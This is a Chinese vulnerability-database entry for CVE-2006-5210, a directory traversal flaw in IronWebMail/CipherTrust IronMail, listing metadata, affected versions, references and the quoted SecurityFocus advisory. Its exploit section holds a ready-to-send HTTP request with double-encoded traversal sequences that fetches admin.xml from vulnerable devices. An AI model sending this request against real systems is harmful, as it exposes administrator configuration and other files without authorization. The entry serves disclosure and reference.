IronWebMail HTTP请求目录遍历信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111299 漏洞类型 路径遍历
发布时间 2006-10-16 更新时间 2006-10-16
CVE编号 CVE-2006-5210 CNNVD-ID CNNVD-200610-217
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/28778
https://www.securityfocus.com/bid/20436
https://cxsecurity.com/issue/WLB-2006100090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-217
|漏洞详情
IronWebMail是一款企业级的硬件防火墙设备。IronWebMail在处理畸形HTTP请求时存在目录遍历漏洞,远程攻击者可以利用此漏洞通过在URL中嵌入编码后的目录遍历串访问设备上的任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/20436/info

IronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input.

Exploiting this issue allows remote, unauthenticated attackers to retrieve the contents of arbitrary files from vulnerable computers with the privileges of the webserver process. Information harvested may aid in further attacks.

IronWebMail versions prior to 6.1.1 HotFix-17 are affected by this vulnerability.

GET /IM_FILE(%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/admin.xml) HTTP/1.0[CRLF][CRLF]
|受影响的产品
CipherTrust IronMail 6.1.1 CipherTrust IronMail 5.0.1 CipherTrust IronMail 4.5.1 CipherTrust IronMail 4.1 CipherTrust IronMail 6.0 CipherTrust IronMail 5.0
|参考资料

来源:BID
名称:20436
链接:http://www.securityfocus.com/bid/20436
来源:BUGTRAQ
名称:20061013SYMSA-2006-010:DirectoryTraversalinIronWebMail
链接:http://www.securityfocus.com/archive/1/archive/1/448779/100/0/threaded
来源:MISC
链接:https://supportcenter.ciphertrust.com/vulnerability/IWM501-01.html
来源:MISC
链接:http://www.symantec.com/enterprise/research/SYMSA-2006-010.txt
来源:XF
名称:ironwebmail-url-directory-traversal(29620)
链接:http://xforce.iss.net/xforce/xfdb/29620
来源:VUPEN
名称:ADV-2006-4055
链接:http://www.frsirt.com/english/advisories/2006/4055
来源:SECTRACK
名称:1017069
链接:http://securitytracker.com/id?1017069
来源:SREASON
名称:1726
链接:http://securityreason.com/securityalert/1726
来源:SECUNIA
名称:22406
链接:http://secunia.com/advisories/22406